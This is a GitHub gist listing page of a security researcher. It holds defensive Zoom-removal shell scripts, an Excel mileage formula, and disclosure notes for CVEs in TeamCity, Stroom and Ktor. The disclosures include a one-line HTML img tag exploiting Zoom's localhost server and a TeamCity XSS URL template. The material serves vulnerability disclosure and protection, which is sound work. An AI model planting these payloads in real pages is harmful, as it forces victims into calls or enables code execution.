Skip to content

Instantly share code, notes, and snippets.

View JLLeitschuh's full-sized avatar

Jonathan Leitschuh JLLeitschuh

738 followers · 71 following
View GitHub Profile
@JLLeitschuh
JLLeitschuh / permanent_zoom_server_remover.sh
Created July 8, 2019 23:17
Permanently removes the Zoom localhost webserver and prevents it from being reinstalled in the future.
rm -rf ~/.zoomus
touch ~/.zoomus
@JLLeitschuh
JLLeitschuh / disable_video_by_default_for_zoom.sh
Created July 9, 2019 00:01
# For just your local account
defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# For all users on the machine
sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1
@JLLeitschuh
JLLeitschuh / CVE Numbers.md
Last active October 30, 2019 18:22
@JLLeitschuh
JLLeitschuh / CVE-2019-15848.md
Last active December 29, 2019 01:30
Full POC for CVE-2019-15848

CVE-2019-15848: TeamCity XSS to Remote Code Execution

This POC demonstrates taking advantage of a XSS vulnerability in TeamCity allowing an attacker to achieve Remote Code Execution on a build agent if the victim has the ability to add steps to a CI job.

POC

The POC can be simplified to the following URL:

https://[domain.com]/project.html?projectId=[target_project_id]&tab=problems%27%7D)%3B%7D)()%3B[JS_PAYLOAD]
@JLLeitschuh
JLLeitschuh / CVE-2019-10779_GCHQ_Stroom_POC.md
Last active January 21, 2020 17:11
POC for CVE-2019-10779

GCHQ Stroom is vulnerable to Cross-Site Scripting due to the ability to load the Stroom dashboard on another site and insufficient protection against window event origins.

Versions

  • Affected versions: < 5.5.12 & < 6.0.25
  • Patched versions: 5.5.12 & 6.0.25

POC

Launch Stroom and assign it a hostname like stroom.my-company.com, then log in.

@JLLeitschuh
JLLeitschuh / DistanceDictionaryCalculation
Created March 16, 2017 00:04
A bit of code used in excel to help my mom calculate the distance she drove for work and medical miles in a given year to help fill out her tax returns.
=IF(N3="",IF(ISNA(VLOOKUP(B3,'Distance Dictionary'!$A$3:$B$129,2, FALSE)),"",VLOOKUP(B3,'Distance Dictionary'!$A$3:$B$129,2, FALSE)),IF(OR(M3="Two Way", M3="two way"),"",N3))
@JLLeitschuh
JLLeitschuh / zoom_poc_simple.html
Last active April 3, 2020 18:50
Simplest example of the Zoom exploit
<img src="http://localhost:19421/launch?action=join&confno=492468757"/>
@JLLeitschuh
JLLeitschuh / How To Use GitHub Security Advisories.md
Last active July 14, 2020 16:55
An explanation of how to work with GitHub security advisories.

GitHub Security Advisories

If this is your first time using GitHub Security Advisories, please allow me to guide you through how they work.

Advisories are Private

As of September 17th, 2019, when advisories are published, the entire discussion within the advisory will not be made public. Any information you want to provide to the public should be included in the advisory body.

Updating an Advisory

@JLLeitschuh
JLLeitschuh / CVE-2019-19389-Ktor-CWE-113.md
Last active October 23, 2020 08:29
POC For: CVE-2019-19389
@JLLeitschuh
JLLeitschuh / permanent_zoom_and_ringcentral_server_remover.sh
Created July 9, 2019 13:23
# To prevent the vulnerable server from running on your machine
# (this does not impact Zoom functionality), run these two lines in your Terminal.
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
# (You may need to run these lines for each user on your machine.)